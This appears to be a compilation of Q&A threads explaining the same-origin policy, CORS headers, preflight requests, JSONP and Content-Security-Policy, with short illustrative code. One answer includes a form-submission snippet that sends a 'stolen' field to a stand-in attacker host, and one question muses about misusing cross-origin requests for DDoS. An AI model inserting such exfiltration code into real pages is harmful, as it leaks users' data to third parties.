I spent the last three days studying how to make a cross-domain request using XMLHttpRequest. The best alternative is indeed JSONP, which I am already using.
But I still have a question that I could not find an answer to anywhere. I have read hundreds of posts (including on SO) and nobody has a good, reliable answer (with a solid reference). I hope someone here can help.
That said, I read on many websites that, for security reasons, I cannot make an Ajax request from domain aaa.com to bbb.com and get the data I want. That is very clear and I have no question about it. BUT the problem arises when I run the code below on my localhost (so my domain is "localhost" and I should not be able to request data from any other domain):
var xhReq = new XMLHttpRequest();
xhReq.open("GET", "http://domain.com?parameter", true); // asynchronous cross-origin GET
xhReq.send(null); // the request is dispatched regardless of the target's origin
When I inspect the Firebug Net tab, I realize that the request was not blocked! It was clearly sent. I could not believe it, so I created a file at domain.com/log.php where I could log any request that hit my domain. Surprisingly, all the requests I was firing from localhost were hitting domain.com. When I tried to fetch the response, I really could not get it, due to the same-origin policy of my Chrome and Firefox browsers. But I was really surprised that the request actually hit the web server, even though I could not manipulate the response.
More surprising is that if domain.com/log.php generates a huge response, say 1 MB, Firebug shows that the browser downloads ALL of that 1 MB from the web server, and only at the end does it show an "Access denied" message, as expected. So why download the whole file if the same-origin policy forbids that data from being read?
Finally, what amazes me is that all the websites and specifications I read state very CLEARLY that an Ajax request is blocked when the target domain does not match the source domain. But clearly, in my experiment, the requests are being completed, even though I cannot access the response data.
What makes me upset is that this could open a BIG security hole: a website with thousands of views every day could run this three-line snippet and cause a HUGE DDoS attack on an unfriendly website, simply by making its users request a page from that other site at short intervals, since the browser will not block the requests.
I tested this script in IE 7, 8, and 9 and in the latest Chrome and Firefox, and the behaviour is the same: the request is made and the browser downloads the entire response while not making it available, due to the SOP.
I hope someone can explain why the specs seem so wrong about this, or what I am misunderstanding!
This happens because the same-origin policy is enforced on the client side (the browser) by evaluating the following access-control header values returned from the server:
Access-Control-Allow-Origin
Access-Control-Allow-Methods
Access-Control-Allow-Headers
As you can see, the request must first complete on the server in order for the browser to inspect the returned headers. This is exactly why your request executes on the server.
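A minimal sketch of what that looks like from the page's side, assuming the question's localhost setup and its domain.com/log.php endpoint:

var xhr = new XMLHttpRequest();
xhr.open("GET", "http://domain.com/log.php", true);
xhr.onreadystatechange = function () {
  if (xhr.readyState === 4) {
    // The request completed on the server, but no Access-Control header
    // allowed this origin, so the browser withholds the response: status
    // reads as 0 and responseText is empty, even though the Net tab shows
    // the full body was downloaded.
    console.log(xhr.status, xhr.responseText);
  }
};
xhr.send(null);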
You can have a look at "Principles of the Same-Origin Policy" by A. Barth.
See bobince's answer to a similar question:
As per XMLHttpRequest Level 2, browsers allow cross-origin GETs to be sent without preflighting, but don't allow the results to be read from the response unless the remote domain opts in. There is no additional vulnerability here because you can already cause a GET to an arbitrary URL to be sent (including query string, for what it's worth) through multiple more basic interfaces.
For example, you have always been able to create an <img> element with its src set to an address on a remote domain; taking away that cross-domain ability would break a lot of the existing web.
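A minimal sketch of that, reusing the question's hypothetical domain.com/log.php endpoint:

var img = new Image();
// Fires a GET at the remote server; the response is never exposed to script.
img.src = "http://domain.com/log.php?parameter=1";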
Related:
Caniuse
XHR2 Spec
So I have been developing a webpage that would give random quotes whenever a user clicks a button, by calling an API.
Please refer to my previous question for more information: Not able to get values (quotes) from the API using jquery.
I was told that the reason I couldn't get the response from the API is that my ACAS (Access-Control-Allow-Origin) header is not set properly on my server, and that I have to debug it.
Now, I don't know much about ACAS or CORS, so I have some questions. Here they are:
1. What exactly is ACAS and how is it related to CORS?
2. How do I debug my page and set the ACAS?
3. Does that have anything to do with my jQuery? Or should I only configure my browser?
You can find many documents on the internet, so I'll just briefly talk about CORS. When you send a request to a different domain, for example from a.com to b.com, or from localhost:8080 to a.com, and so on, you're making a cross-origin HTTP request. Sometimes this is not allowed, for example for Ajax requests (as you're making).
This is because XMLHttpRequest and Fetch (both Ajax APIs) follow the same-origin policy, which means that by default you can only make requests within the same domain, e.g. from site.com to site.com/users.
The reason they follow the same-origin policy is to prevent CSRF (cross-site request forgery) attacks.
1. So basically you cannot get the result of a cross-site Ajax request; the browser will block it for security reasons, unless the response header Access-Control-Allow-Origin is set to allow the client's site to make cross-site Ajax requests. For example, Access-Control-Allow-Origin: * allows sites from all domains, while Access-Control-Allow-Origin: www.b.com allows only the www.b.com domain.
2. Take Chrome, for example: if the cross-site request's result is blocked, an error will show up in the browser's console.
You need to set the response header on your server. For example, when I set Access-Control-Allow-Origin: *, the browser's "Network" console shows that the header is set, and I can then get the Ajax result.
I think nothing needs to be done on the client side; it is all on the server side.
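A minimal sketch of that server-side fix, assuming a Node.js backend (every server stack has an equivalent way to set this header):

const http = require("http");

http.createServer(function (req, res) {
  // Allow any origin; replace "*" with a specific origin to be stricter.
  res.setHeader("Access-Control-Allow-Origin", "*");
  res.setHeader("Content-Type", "application/json");
  res.end(JSON.stringify({ quote: "An example quote." })); // hypothetical payload
}).listen(8080);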
Refer to this post, as it makes this clear.
Note also that there are some techniques frequently used to bypass CORS, like setting up a proxy that acts as a relay for your requests, or using JSONP instead of JSON.
So a couple of days ago I was looking for something like this and actually found it, but never found a use for it. I know it's listed somewhere on Mozilla's site, but I forget what the function is called.
In any case, I wish to request an external domain that doesn't have CORS, without external help from things like proxies. It's a rather recent function added to JavaScript; when I read about it (before I forgot the name) it was listed as experimental technology. It's supposedly a safe alternative to CORS; the only catch is that, unlike CORS, you are not allowed to view the response.
What I want to use it for is basically to see if the returned status code is 404 or 200, so I can tell users whether a specific site is having issues. Since the number of sites that would be requested is huge if I did it server-side, I'd prefer to have it done in the client's browser, and only on specific pages.
I think you could get by with sending a HEAD HTTP request.
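One hedged sketch of that idea uses fetch's "no-cors" mode with a HEAD request (the URL below is hypothetical). The catch matches what the question describes: the response is opaque, so the status code itself is not readable; a resolved promise only tells you the server answered at all, while a rejection indicates a network-level failure:

fetch("http://site-to-check.example.com/", { method: "HEAD", mode: "no-cors" })
  .then(function (response) {
    // response.type is "opaque": status reads as 0 whether it was 200 or 404.
    console.log("Server responded (the exact status is hidden).");
  })
  .catch(function () {
    console.log("Server unreachable, or the request failed at the network level.");
  });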
I want a simple JavaScript script that lives on my localhost to make a connection to another domain (e.g. anotherdomain.com) with Ajax and get the response, but all my browsers give me the error: connection blocked, Reason: CORS header 'Access-Control-Allow-Origin' missing.
But when I check the network traffic with a network monitor program like Fiddler, I see that the response already came from the server at anotherdomain.com to my local machine; it is just my browser that is blocking me from getting it!!
1- Can I order my browser to ignore the CORS rules using JavaScript code?
2- What are my options to overcome this problem? Is building a custom desktop client application with C# to send and receive requests freely the best way to do it?
3- Is the CORS policy designed to protect web clients or web servers?
Thank you, and please consider that I'm a complete newbie in web development.
But when I check the network traffic with a network monitor program like Fiddler, I see that the response already came from the server at anotherdomain.com to my local machine; it is just my browser that is blocking me from getting it!!
Well, for sure the connection was established to check the presence of the header you mentioned, but the data was unlikely to be transferred.
Regarding your questions:
1. There are actually two options. One is to set the Access-Control-Allow-Origin header, with the proper origin for your site, on the server's response. The second is to make a JSONP call, though the server's response must support such a solution (see the JSONP sketch after this list).
2. The best option is to have a server with the above header specified. Your server would handle all the network stuff on its side, and your script would just send requests and get responses.
3. I would say it is designed more to protect the server. Imagine the following situation: a script on your site makes a lot of POST requests to another site. Actions like submitting forms, etc. could happen and would be allowed. That's harmful, right? You can read about that in this stack question.
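A minimal JSONP sketch for the option mentioned above (it assumes the server supports a callback query parameter and replies with a script body like handleData({...}); the URL and parameter name here are hypothetical):

// The server is expected to wrap its JSON in a call to the named callback.
function handleData(data) {
  console.log(data); // the cross-domain payload arrives as a function argument
}

var script = document.createElement("script");
// <script> tags are not subject to the same-origin policy, which is the loophole JSONP uses.
script.src = "http://anotherdomain.com/api?callback=handleData";
document.head.appendChild(script);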
This is a concept that I thought I understood, but recently found out I had gotten all wrong. I've looked all around the internet and found plenty of examples of small details and code snippets, but I still lack an understanding of what it prevents, why it prevents it, and for whose sake. So this is more of a request for a high-level explanation than a question.
Anyways, here's what I THINK I understand about it:
Let's say I have domain A.com and domain B.com, each on its own Apache server with its own IP address.
I load an HTML file from domain A.com into a browser. The browser executes a POST XMLHttpRequest to B.com/doStuff.php, which fails because the same-domain policy is set.
So:
Whose same-domain policy is relevant? I think the answer is B.com/doStuff.php's... right? So when A sends the request, does B check the request headers for an origin and say, "whoops, different domain, won't listen to you"? Or does A send the request, B respond with headers that specify a same-domain policy, and then, because the policy was specified and the domain from A's request doesn't match B's, the BROWSER refuses to send out the XHR?
If that's the case, it seems that the point of not allowing cross-origin requests is "I don't want anyone other than me accessing my API". Is that all? Because wouldn't you want to solve that with some kind of authentication instead? Couldn't someone just construct an HTTP request with a fake origin header (simply lie)?
Or is this somehow supposed to protect the user? If that's the case, how is preventing them from calling your API ever going to protect anyone?
I'm so confused...
Whose same-domain policy is relevant?
The server receiving the request decides.
... the BROWSER refuses to send out the XHR?
No, the server refuses to respond. To be more exact, in modern browsers this is done by preflighted requests: for each cross-origin request, an OPTIONS request is first sent automatically by the browser, with headers exactly matching those the intended request will have, but with no request body. The server also responds with headers only. The Access-Control headers in the response let the client browser know whether the request would be fulfilled according to the server's policies. In a sense the browser is preventing the request, but only because it has already exchanged a request/response pair with the server and knows there would be no point in attempting the real request. If you forge a request in such a case, the server will still deny serving it.
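A sketch of that exchange, using the question's B.com/doStuff.php and a request that is not "simple" (a JSON-typed POST), which is what triggers the preflight:

// From a page on A.com: a cross-origin POST with a JSON body is not a
// "simple" request, so the browser automatically sends an OPTIONS
// preflight before it.
fetch("http://B.com/doStuff.php", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ stuff: true })
});
// Preflight the browser sends on its own (roughly):
//   OPTIONS /doStuff.php
//   Origin: http://A.com
//   Access-Control-Request-Method: POST
//   Access-Control-Request-Headers: content-type
// For the real POST to follow, the server's reply must include e.g.:
//   Access-Control-Allow-Origin: http://A.com
//   Access-Control-Allow-Methods: POST
//   Access-Control-Allow-Headers: Content-Type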
The idea is that you don't want to access server B from site A via JavaScript. If you're interacting with an API, you would use JavaScript to make a call to your own server's backend code, which would then make a call to the other server.
I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand it, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.
So the expanded sequence would be:
1) Supply a page with a list of acceptable CORS servers (abc.com, xyz.com, etc.)
2) Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list, and authentication proceeds as normal.
3) Page wants to make an XHR request to malicious.com - the request is rejected locally (i.e. by the browser) because the server is not in the list.
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even back as far as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests, caused by interfaces as simple as form.submit(), new Image, or setting window.location.
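A sketch of the age-old form technique (the target URL and field here are hypothetical):

var form = document.createElement("form");
form.method = "POST";
form.action = "http://evil.example.com/collect"; // hypothetical foreign endpoint
var field = document.createElement("input");
field.type = "hidden";
field.name = "stolen";
field.value = "sensitive data already readable by the page";
form.appendChild(field);
document.body.appendChild(form);
form.submit(); // cross-origin POST; no CORS involved, none consulted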
If malicious code has access to sensitive information, you have already totally lost.
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to exploit the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is more than just where data can be sent, but also where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making the cross-domain policy on other tags (script/image) stricter, while more secure, would break a lot of existing code and make it much more difficult to adopt the new technology. Hopefully, something will be done to close that security hole, but I think they need to make sure it's an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or—as you've requested here—you can explicitly tell the browser which domains the page is allowed to contact.
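A sketch of that second capability, using CSP's connect-src directive with the example domains from the question above; it can be delivered as an HTTP response header or as a meta tag:

Content-Security-Policy: connect-src 'self' https://abc.com https://xyz.com

With that policy in place, an XHR or fetch to malicious.com is rejected locally by the browser, which is essentially the whitelist behaviour asked for above.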
The problem isn't that a site can access another site's resources that it already had access to. The problem is one of domain -- if I'm using a browser at my company, and an Ajax script maliciously decides to try out 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution -- CORS. I'm not saying it's the best, but it solves this issue.
1) If the gateway can't return the 'bobthehacker.com' accepted-origin header, the request is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an ORIGIN of 'bobthehacker.com'. In the SIMPLE CORS case, it will actually still return the results by default; you can configure the server to not even do that. Then the results are discarded without being loaded by the browser.
3) Finally, even if it would accept certain domains, you have some control over which headers are accepted and rejected, so that requests from those sites conform to a certain shape.
Note -- the Origin header and the OPTIONS request are controlled by the requester -- obviously someone crafting their own HTTP request can put whatever they want in there. However, a modern CORS-compliant browser WON'T do that. It is the browser that controls the interaction. The browser is what prevents bobthehacker.com from accessing the gateway. That is the part you are missing.
I share David's concerns.
Security must be built layer by layer, and a whitelist served by the origin server seems to be a good approach.
Plus, this whitelist could be used to close the existing loopholes (forms, script tags, etc.); it's safe to assume that a server serving such a whitelist is designed to avoid backward-compatibility issues.